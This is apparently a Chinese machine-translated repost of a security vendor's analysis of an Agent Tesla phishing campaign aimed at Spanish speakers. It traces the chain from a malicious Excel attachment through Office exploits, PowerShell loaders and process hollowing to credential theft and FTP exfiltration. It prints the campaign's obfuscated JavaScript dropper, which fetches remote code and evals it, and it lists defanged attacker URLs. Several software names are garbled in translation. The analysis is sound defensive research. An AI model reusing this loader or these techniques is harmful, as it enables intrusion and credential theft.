新的特工特斯拉活动针对西班牙语人群

严重性级别:紧急

我们的FortiGuard实验室最近捕获了一个新的网络钓鱼活动，该活动传播了一种针对西班牙语人群的新Agent Tesla变体。

多年来，安全研究人员不时发现特工特斯拉的活动。Agent Tesla是一种知名的基于。net的远程访问木马(RAT)，其目的是潜入受害者的计算机，窃取其敏感信息，如计算机的硬件信息、登录用户信息、击键信息、电子邮件联系人、web浏览器cookie文件、系统剪贴板数据、截图以及登录用户名、计算机名、操作系统信息、CPU和RAM信息等基本信息，以及广泛安装的软件中保存的凭据。

对这次攻击的深入研究表明，它还利用多种技术来提供Agent Tesla核心模块，例如使用已知的MS Office漏洞、JavaScript代码、PowerShell代码、无文件模块等，以保护自己不被安全研究人员分析。

在此分析中，我将详细说明该活动如何将Agent Tesla加载到受害者的计算机上，它是如何启动的，它能够收集哪些敏感数据，以及它将窃取的数据发送给攻击者的方式。

网络钓鱼邮件

图1 -网络钓鱼邮件。

从上面的截图中可以看出，这封钓鱼邮件是用西班牙语写的。这条信息翻译成英文是:

Good day

Attached is proof of payment made to your account according to your client's instructions.

网络钓鱼电子邮件看起来像是大型金融机构发送给受害者的标准SWIFT转账通知，带有伪装的Excel附件(transferencia_swift_87647574684.xla)，如图1所示。

您可能已经注意到，forticclient服务将钓鱼电子邮件标记为“[检测到病毒]”，以警告用户注意附件中的Excel文档。

Excel文档

该Excel文档采用OLE格式，带有精心制作的嵌入式数据，利用了CVE-2017-0199漏洞。它包含一个嵌入式OLE超链接，一旦受害者启动Excel文档，该链接就会自动打开。文档中提供的超链接为“hxxp[:]//ilang[。]in/QqBbmc”，如图2所示。

图2 -嵌入式OLE超链接到在线RTF文档。

一旦受害者打开Excel文件，它就会自动下载一个RTF文档，然后Word程序调用该文档打开。图3显示了流量以及URL如何下载RTF文档。

图3 - RTF文档中的方程内容

漏洞利用CVE-2017-11882

CVE-2017-11882是Microsoft Office的Equation Editor组件(EQNED32.EXE)中的RCE(远程代码执行)漏洞。它可以被Excel、Word、PowerPoint和RTF文档利用，只要它们在OLE对象中包含精心制作的方程数据。成功利用此漏洞允许攻击者在受害者的计算机上执行任意代码。

此缓冲区溢出漏洞覆盖EQNED32.EXE堆栈中的返回地址。然后它可以劫持进程跳转到并执行在堆栈中复制的恶意代码。

图4 -精心制作的方程数据。

图4显示了从下载的RTF文档中提取的精心制作的方程数据。标记为红色的数据是EQNED32.EXE的恒定地址，当缓冲区溢出发生时，它将覆盖堆栈中的返回地址。

一旦shellcode被执行，它就会从网站下载JavaScript代码，并在受害者的计算机上执行。在图5中，shellcode将要调用一个API URLDownloadToFileW()，将JavaScript文件从“hxxp[:]//equalizerrr[.]duckdns.org/eveningdatingforeveryone.js”下载到本地文件“C:UsersBobsAppDataRoaming morningdating玫瑰花.js”。

图5 -将JavaScript文件下载到本地的Shellcode

然后调用API ShellExecuteW()来执行JavaScript文件(调用Windows程序WScript.exe来执行JS文件)。最后，它通过调用API ExitProcess()退出进程。

JavaScript文件导致执行PowerShell代码

下面是JavaScript文件的代码片段。很明显，它继续从“hxxps[:]//paste[.]ee/d/yWWXG”下载另一个文件。这个JavaScript文件在调用eval()函数之后执行。

morningdatingroses.js:

var paparicos = new ActiveXObject("MSXML2.XMLHTTP");var alijar = "GXWWy/d/ee.etsap//:sptth".split("").reverse().join("");paparicos.open("GET", alijar, false);paparicos.send();var vomitar = "";if (paparicos.status === 200) {    vomitar = paparicos.responseText;}function estarostia(piguancha) {eval(piguancha);}estarostia(vomitar);

图6 - Base64编码的PowerShell代码。

当在web浏览器中打开URL时，它看起来像普通的JavaScript代码，但它包含一段带有base64编码的PowerShell代码的恶意代码。该代码将被解码并与其他代码组合(如下所示)，并在“powershell.exe”进程中执行，如图6所示。

PowerShell代码的目的包括:

1. 下载一个带有base64编码的。net模块(加载模块)的普通jpg文件。jpg文件的URL是一个常量字符串:" hxxps[:]//uploaddeimagens[.]com[.]br/images/004/773/812/original/js.jpg?1713882778 "。

2. 从jpg文件中提取加载模块，对其进行base64解码，并将其加载到PowerShell的内存中。

3. 在命名空间和类下调用加载器模块的VAI()方法。

有关PowerShell代码的更多信息，请参见图7。

图7 - base64解码的PowerShell代码

加载模块是一种永远不会保存在本地文件夹中的无文件模块。这使得研究人员很难注意到该文件，除非进行一步一步的深入分析。

方法VAI()的第一个参数是代理特斯拉核心模块的反向URL，即“hxxp[:]//equalizerrr[.]duckdns[.]org/droidbase64controlfire.txt”。第二个参数是开关。如果它是“1”，它将通过将自己添加到系统注册表中的自动运行组来在受害者的计算机上建立持久性。在这种情况下，它是“desativado”，所以它不会建立。

倒数第二个参数是进程名，对于这个变体来说是“AddInProcess32”。

加载器模块简介

运行在PowerShell进程中的加载模块从第一个参数传递的URL中下载文件，并将其保存在内存中。这是Agent Tesla核心模块，如图8所示。

图8 -加载模块下载Agent Tesla可执行文件

之后，它通过调用API CreateProcessA()以创建标志0x80000004 (CREATE_SUSPENDED)在挂起状态下启动'AddInProcess32'进程。

接下来，加载器模块对它将Agent Tesla可执行文件复制到其中的进程执行空穴操作，并在“AddInProcess32.exe”进程中执行该进程。为此，它调用api，如GetThreadContext()、VirtualAllocEx()、WriteProcessMemory()、SetThreadContext()和ResumeThread()。

图9显示了流程树，概述了整个过程，从Excel文档开始，以在“AddInProcess32.exe”中运行的Agent Tesla结束。

图9 -相关流程的流程树

Agent Tesla可执行模块

Agent Tesla的这个变体是一个32位。net框架程序，它被混淆为一个无文件模块。图10显示了一个调试器，它在EntryPoint方法中破坏了Agent Tesla，其中名称空间、类、方法和代码流都被混淆了。

图10 -在调试器中混淆的Agent Tesla可执行文件

一种特殊的方法旨在检测它是否在分析环境中运行。它执行以下检测:

• 它调用Windows API CheckRemoteDebuggerPresent()来确定它是否被调试。

• Agent Tesla计算在休眠10毫秒之前和之后的两个tick计数之间的差异，以检测它是在调试还是在VM中运行。

• 检查当前进程中是否加载了一些杀毒软件或沙盒相关的dll，如沙盒的“shiedll .dll”，奇虎360的“sxindll”，Avast的“Sf2.dll”，Sophos Intercept X的“snxhk.dll”，科莫多的“cmdvrt32.dll”。

• Agent Tesla通过执行两个WMI查询来检索计算机的硬件信息，如视频控制器的“制造商”、“型号”和“名称”，从而检查它是否在虚拟化环境中运行。然后在检索到的硬件信息中匹配一些关键字，如“Microsoft corporation”、“VMware”、“VIRTUAL”、“VirtualBox”和“VBox”。

• 它访问URL“hxxp://ip-api[.]com/line/?”Fields =hosting”，并检查响应是否为“true”。这允许它检查它是运行在主机提供商还是数据中心中。

一旦上述检测结果中的任何一个为“真”，它就退出该进程。

从受害设备窃取的敏感信息

在本节中，我将回顾Agent Tesla的功能，例如该变体如何从受害者的设备收集凭据和电子邮件联系人，从中收集数据的软件以及受害者设备的基本信息。

它从一些网页浏览器窃取保存的凭证，这些浏览器分为基于chrome和基于mozilla，因为它们使用相同的文件夹结构和文件来保存凭证。它从浏览器配置文件文件夹下的“登录数据”文件中读取保存的凭据，用于chrome浏览器。图11显示，它刚刚从其配置文件“{浏览器的配置文件路径}DefaultLogin Data”和“{浏览器的配置文件路径}Login Data”中获得了一些“Opera浏览器”(基于chrome的浏览器)凭据。

图11 -从基于chrome的浏览器窃取凭据。

图12 -从基于mozilla的浏览器窃取的凭证。

图12显示它刚刚从Firefox浏览器的配置文件中获得凭据。

此变种将从以下web浏览器列表中窃取凭据。

基于chrome的Web浏览器

“Orbitum，”“Cool Novo”，“Sputnik”，“green”，“iriididi浏览器”，“vibao浏览器”，“vivaidi浏览器”，“vivaidi浏览器”，“chroon浏览器”，“chinroon”，

基于mozilla的Web浏览器

“火狐”、“网络狐狸”、“水狐狸”、“k - melon”、“post”、“Thunderbird浏览器”、“IceCat”、“Flock”、“IceDragon”、“BlackHawk”、“palemwk”、“palemawk”、“SeaMonkey”。

除了上述web浏览器之外，Agent Tesla还会继续从各种各样的软件中寻找更多保存的凭据，我在下面对它们进行了分类。

其他网页浏览器:

“Falkon浏览器”、“Flock浏览器”、“IE/Edge浏览器”、“QQ浏览器”、“Safari for Windows”和“UC浏览器”。

电子邮件客户端:

Outlook, Opera Mail, PocoMail, The Bat!， Becky!， ClawsMail, FoxMail, IncrediMail, eM Client, Mailbird, Eudora和Windows Mail App。

FTP客户端:

"CoreFTP " "Flash FXP " "FTPGetter " "FTP导航" "SmartFTP " " ftptp " "WinSCP "和"WS_FTP "

VPN客户端:

“NordVPN”、“TightVNC”、“RealVNC”、“UltraVNC”、“OpenVPN”和“Private Internet Access”。

IM客户端:

“不和”、“洋泾浜”、“崔莉安”、“Psi/Psi”和“Paltalk”。

其他:

"MysqlWorkbench " "DynDns " "Microsoft Credentials " "Internet Downloader Manager "和"JDownloader "

特工特斯拉也可以收集受害者的电子邮件联系人，如果他们使用雷鸟作为他们的电子邮件客户端。global-messages-db内部。在雷鸟配置文件文件夹下，有一个名为global-messages-db.sqlite的文件。它是一个SQLite数据库，存储所有消息的索引，包括附件、密件抄送和抄送电子邮件、文件夹名称等。特工特斯拉从这些文件中提取所有联系人(电子邮件地址)。

图13 -特工特斯拉收集受害者的联系方式

根据我的分析，这个变体禁用了一些功能(默认情况下，一些开关变量被设置为“false”)，例如键盘记录器、屏幕记录器、系统剪贴板记录器和cookie。详细信息请参见图14。

图14 -默认情况下禁用了一些特性

Agent Tesla还会收集受害者计算机的系统日期和时间、登录用户名、计算机名、公共IP地址、操作系统全名、CPU信息、RAM容量等信息。

将被盗数据提交到FTP服务器

在过去，我们捕获了许多使用HTTP POST和SMTP将窃取的数据提交到C2服务器的Agent Tesla变体。这种变体使用一种新的方式通过FTP协议提交从受害者设备收集的数据。FTP服务器地址及其凭证是保存在一些全局变量中的明文字符串。

图15 -通过FTP提交窃取的数据

图15是Agent Tesla准备提交使用FTP方法“STOR”从我的测试机器窃取的凭证的截图。FTP上的文件名格式为“PW_{用户名-计算机名e_系统数据和时间}.html”;内容是HTML格式的被盗数据。

收集的邮件联系人信息保存在一个名为“Contacts_Thunderbird.txt_{用户名-计算机名e_系统数据和时间}.txt”的txt文件中。我的测试机器上的一个例子是“Contacts_Thunderbird.txt_Bobs-BOBS-PC_2024_05_17_17_34_21.txt”。txt文件中包含从雷鸟收集到的所有邮件地址。

总结

在这个分析中，我经历了针对西班牙语人群的Agent Tesla活动的整个过程。图16中的流程图概述了这种复杂的恶意活动，详细描述了从网络钓鱼电子邮件到将被盗信息提交到FTP服务器的过程。

图16 - Agent Tesla活动的整个过程

原文始发于微信公众号（HackSee）：新的特工特斯拉活动针对西班牙语人群